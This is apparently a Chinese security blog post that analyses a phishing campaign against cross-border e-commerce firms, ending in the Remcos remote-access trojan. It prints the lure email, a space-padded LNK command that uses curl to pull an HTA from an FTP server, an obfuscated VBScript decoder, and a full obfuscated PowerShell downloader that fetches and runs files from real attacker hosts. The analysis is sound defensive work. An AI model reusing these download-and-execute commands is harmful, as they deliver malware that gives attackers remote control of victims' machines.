针对跨境电商的钓鱼邮件分析 - FreeBuf网络安全行业门户

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

咨询

^{0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9}

针对跨境电商的钓鱼邮件分析

DeepPhish 2025-03-19 18:46:25 42869

所属地广东省

1、邮件分析

近期收到某跨境企业客户举报发现钓鱼邮件，从发件人看上去都很正常。跨境电商绝对是黑阔的重点目标，重点受害群体。

1742380509_67da9ddd19fb5a0972a09.png!small?1742380510133

社工话术如下：

下午好,
我们之前和贵公司下过订单，对贵公司的产品质量非常满意。由于这次积极的经历，我们想再下一个订单。随函附上我们希望购买的物品清单。请向我们提供这些产品的价格和运费到以下地址：
Marigalante 427, De Las Americas, Heriberto Kehoe Vicent, 94299 Boca del Rio, Veracruz, Mexico
我们期待您的快速回复，以便尽快完成您的订单。

真诚,
Anahy Zarate Cortes
购买Manager
PIASA小组

上传到deepphish发现，实际发件邮箱为“info@pavsr.ooguy.com”。因为有些邮件客户端只显示发件人display name，不显示具体邮箱，极具迷惑性，亮瞎我得钛金眼。

1742380544_67da9e003caca0a67de0f.png!small?1742380545315

发件人来源：5.149.253.242

1742380558_67da9e0ec73fcba184cb2.png!small?1742380559348

该邮件已经被客户的服务器打上了垃圾邮件标识，被隔离到了客户端垃圾箱中，但依然被员工点击中招，毕竟有个订单不容易。

1742380575_67da9e1f7a3ffb8689cee.png!small?1742380575863

查看邮箱正文部分诱导用户点击打开附件，附件实际为一个经过混淆加密的恶意程序。

2、样本分析

样本zip解压后为一个lnk文件，运行后会执行一段cmd命令。中间有一长串空格，用以迷惑用户看不到后面的命令参数信息。

C:\Windows\system32\cmd.exe                           /c "curl.exe -s -u 63ddf818-a98c-4ac9-bc69-06cdd215ff96:05613769-3bf7-4da7-9571-fbac4cef4d5d -o %APPDATA%\Acuerdo_de_Orden_de_Compra.hta ftp://45.11.59.49:6152/Acuerdo_de_Orden_de_Compra.hta" & %APPDATA%\A

1742380599_67da9e376dc7d44452dc2.png!small?1742380600050

命令从服器“ftp://45.11.59.49:6152/Acuerdo_de_Orden_de_Compra.hta”下载一个hta文件，该文件为vb代码。代码关键部分已经混淆，文件中字符通过方法进行加密

Function OGVFc(ByVal bVgkqJrMZ)Dim YiRPUeDqtDim ESipMTyUZDim JnYcOWFkDim oDTpZDEzLYiRPUeDqt = VarType(bVgkqJrMZ)oDTpZDEzL = bVgkqJrMZ(UBound(bVgkqJrMZ))If YiRPUeDqt = ((2500 * 4) - 1000) + (100 * 5) - 296 - 1000 ThenFor Each ESipMTyUZ In bVgkqJrMZJnYcOWFk = JnYcOWFk & Chr(ESipMTyUZ - oDTpZDEzL)NextElseJnYcOWFk = Chr(bVgkqJrMZ - oDTpZDEzL)End IfOGVFc = JnYcOWFkEnd Function

为方便分析使用AI将文本转换成js代码，将密文带入进行分析。

function OGVFc(bVgkqJrMZ) {// 检查传入的参数是否为数组const isArray = Array.isArray(bVgkqJrMZ);// 获取数组的最后一个元素const oDTpZDEzL = bVgkqJrMZ[bVgkqJrMZ.length - 1];let JnYcOWFk = '';if (isArray) {// 如果是数组，遍历数组中的每个元素for (let i = 0; i < bVgkqJrMZ.length; i++) {const ESipMTyUZ = bVgkqJrMZ[i];// 将每个元素减去最后一个元素，然后转换为对应的字符并拼接起来JnYcOWFk += String.fromCharCode(ESipMTyUZ - oDTpZDEzL);}} else {// 如果不是数组，直接将传入的参数减去最后一个元素，然后转换为对应的字符JnYcOWFk = String.fromCharCode(bVgkqJrMZ - oDTpZDEzL);}return JnYcOWFk;}

1742380682_67da9e8a293efdf30747d.png!small?1742380683871

1742380695_67da9e97eb6338a32463d.png!small?1742380696852

通过CreateObject ("Wscript.Shell").Run接口运行powersehll命令：

powershell.exe -ExecutionPolicy UnRestricted function l($hrwDwS, $LskqypWSP){[IO.File]::WriteAllBytes($hrwDwS, $LskqypWSP)};function J($hrwDwS){if($hrwDwS.EndsWith((rbf @(263,317,325,325))) -eq $True){Start-Process (rbf @(331,334,327,317,325,325,268,267,263,318,337,318)) $hrwDwS}else{Start-Process $hrwDwS}};function DPa($yPRsaVwn){$LRHJULvrp = New-Object (rbf @(295,318,333,263,304,318,315,284,325,322,318,327,333));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$LskqypWSP = $LRHJULvrp.DownloadData($yPRsaVwn);return $LskqypWSP};function rbf($wIwvny){$RWgnpEQyG=217;$cBobsYG=$Null;foreach($DuNIrxeq in $wIwvny){$cBobsYG+=[char]($DuNIrxeq-$RWgnpEQyG)};return $cBobsYG};function vXL(){$Fu = $env:APPDATA + '\';$yfp = DPa (rbf @(321,333,333,329,332,275,264,264,326,314,331,334,315,318,327,322,263,316,316,264,282,316,334,318,331,317,328,312,317,318,312,296,331,317,318,327,312,317,318,312,284,328,326,329,331,314,263,329,317,319));$i = $Fu + 'Acuerdo_de_Orden_de_Compra.pdf';l $i $yfp;J $i;;$IAK = DPa (rbf @(321,333,333,329,332,275,264,264,326,314,331,334,315,318,327,322,263,316,316,264,326,329,316,325,322,318,327,333,263,317,325,325));$sx = $Fu + 'mpclient.dll';l $sx $IAK;J $sx;;$kUN = DPa (rbf @(321,333,333,329,332,275,264,264,326,314,331,334,315,318,327,322,263,316,316,264,282,316,334,318,331,317,328,312,317,318,312,296,331,317,318,327,312,317,318,312,284,328,326,329,331,314,263,318,337,318));$tM = $Fu + 'Acuerdo_de_Orden_de_Compra.exe';l $tM $kUN;J $tM;;}vXL;

该脚本会下载3个文件写入%APPDATA%目录，并打开运行。针对dll文件使用rundll32.exe进行加载

https://marubeni.cc/Acuerdo_de_Orden_de_Compra.pdfhttps://marubeni.cc/mpclient.dllhttps://marubeni.cc/Acuerdo_de_Orden_de_Compra.exe

其中“https://marubeni.cc/mpclient.dll”，为恶意文件。通过沙箱分析，确定该样本为商用木马Remcos，运行后连接远程地址“104.245.145.253:60142”。

Remcos 木马是一种远程访问木马（RAT），于 2016 年首次现身。传播途径：钓鱼邮件附件：常利用欺骗性钓鱼邮件附件，如 OLE Excel 格式的订单通知文档等，诱骗用户打开文件。恶意下载程序：通过恶意 Microsoft 文档或下载程序进行传播，还曾在涉及 Fruity 恶意软件下载程序的攻击活动中被发现，诱使受害者下载 Fruity 下载程序来最终安装 Remcos。利用漏洞：攻击者会利用软件漏洞传播该木马。如利用 CVE - 2017 - 0199 漏洞，通过包含恶意 Excel 文件的网络钓鱼邮件，文件中的 OLE 对象嵌有恶意 URL，打开后下载执行恶意 HTA 文件，最终将 Remcos 远控木马注入正常 Windows 进程。技术特点：多层混淆：采用多层混淆技术来逃避检测，使安全软件难以识别。进程空洞化：将合法进程内存清空，再注入恶意代码，伪装成合法程序隐蔽运行。反调试技术：具备反调试特性，增加分析和检测难度。添加自启动项：通过修改注册表添加自启动项，实现长期驻留于已感染系统中。

下附木马能力，可以想象，下一步就是长期监控，各种商业诈骗套路了。

1742380749_67da9ecdd087511a51591.png!small?1742380750960